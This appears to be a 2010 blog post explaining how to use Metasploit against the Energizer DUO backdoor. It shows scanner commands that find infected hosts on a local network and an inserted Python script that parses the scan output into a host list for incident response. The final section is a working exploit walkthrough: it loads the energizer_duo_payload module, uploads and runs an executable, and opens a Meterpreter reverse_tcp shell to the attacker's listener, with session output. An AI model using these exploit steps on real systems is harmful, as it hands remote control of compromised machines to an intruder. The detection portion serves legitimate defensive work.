Wednesday, 10 March 2010

How To Exploit the Energizer Trojan

As of Metasploit release version 8749, you can use the following commands to locate infected systems on your local network.

# msfconsole
msf > use auxiliary/scanner/backdoor/energizer_duo_detect
msf auxiliary(energizer_duo_detect) > set RHOSTS
msf auxiliary(energizer_duo_detect) > set THREADS 256
msf auxiliary(energizer_duo_detect) > run

[*] FOUND: [["F", "AUTOEXEC.BAT"] .......
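Once a scan has run, a responder usually wants the list of hosts that answered as infected, not the raw console scroll. The parser below is an added example and is not part of the original post or of Metasploit itself; it assumes each FOUND line is prefixed with `host:port` (as the page's truncated sample does not show the prefix, that format is an assumption), falls back to an "unknown-host" bucket when no prefix is present, and tolerates truncated listings like the one above. The sample output is constructed.

```python
"""Turn energizer_duo_detect console output into a per-host inventory.

Added example, not code from the original post or from Metasploit.
Assumption: infected-host lines look like
    [*] <host>:<port> FOUND: [["F", "AUTOEXEC.BAT"], ...]
where the listing is a Ruby-inspect style array that Python's
ast.literal_eval can also read when it is complete.
"""
import ast
import re
from typing import Dict, List, Tuple

# Constructed sample scanner output; hosts, port and listings are made up.
SAMPLE_OUTPUT = """\
[*] Scanned 010 of 256 hosts (003% complete)
[*] 192.0.2.15:7777 FOUND: [["F", "AUTOEXEC.BAT"], ["D", "Program Files"], ["F", "pagefile.sys"]]
[*] 192.0.2.15:7777 FOUND: [["F", "AUTOEXEC.BAT"], ["D", "Program Files"], ["F", "pagefile.sys"]]
[*] 192.0.2.40:7777 FOUND: [["D", "WINDOWS"], ["F", "boot.ini"]]
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
"""

# Optional "host:port " prefix, then FOUND:, then everything from the first
# "[" to end of line (kept loose so truncated listings still match).
FOUND_RE = re.compile(
    r"^\[\*\]\s+(?:(?P<host>[^\s:]+):(?P<port>\d+)\s+)?FOUND:\s*(?P<listing>\[.*)$"
)


def _parse_listing(text: str) -> List[Tuple[str, str]]:
    """Parse a complete listing into (kind, name) pairs; empty if truncated."""
    try:
        value = ast.literal_eval(text)
    except (ValueError, SyntaxError):
        return []  # truncated or otherwise not a complete array literal
    if not isinstance(value, list):
        return []
    entries = []
    for item in value:
        if isinstance(item, (list, tuple)) and len(item) == 2:
            entries.append((str(item[0]), str(item[1])))
    return entries


def parse_found_lines(output: str) -> Dict[str, List[Tuple[str, str]]]:
    """Return {host: listing} for every FOUND line, deduplicated by host.

    The first listing seen for a host is kept; repeated FOUND lines for the
    same host (a common artifact of rescanning) do not create extra entries.
    """
    hosts: Dict[str, List[Tuple[str, str]]] = {}
    for line in output.splitlines():
        match = FOUND_RE.match(line.strip())
        if not match:
            continue
        host = match.group("host") or "unknown-host"
        hosts.setdefault(host, _parse_listing(match.group("listing")))
    return hosts


def infected_hosts(output: str) -> List[str]:
    """Sorted list of hosts that answered the backdoor probe."""
    return sorted(parse_found_lines(output))


if __name__ == "__main__":
    for host, listing in parse_found_lines(SAMPLE_OUTPUT).items():
        print(f"{host}: {len(listing)} root entries, e.g. {listing[:2]}")
```

Feed it the saved console output (for example from `spool`) and hand the resulting host list to whoever is pulling the affected machines off the network; a host that shows up with an empty listing still counts as infected, only its directory listing was cut short.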

To take things a step further and gain access to a system running this backdoor, use the energizer_duo_payload module:

msf > use exploit/windows/backdoor/energizer_duo_payload
msf exploit(energizer_duo_payload) > set RHOST
msf exploit(energizer_duo_payload) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(energizer_duo_payload) > set LHOST
msf exploit(energizer_duo_payload) > exploit

[*] Started reverse handler on
[*] Trying to upload C:\NTL0ZTL4DhVL.exe...
[*] Trying to execute C:\NTL0ZTL4DhVL.exe...
[*] Sending stage (747008 bytes)
[*] Meterpreter session 1 opened ( ->

meterpreter > getuid
Server username: HACKME\TestUser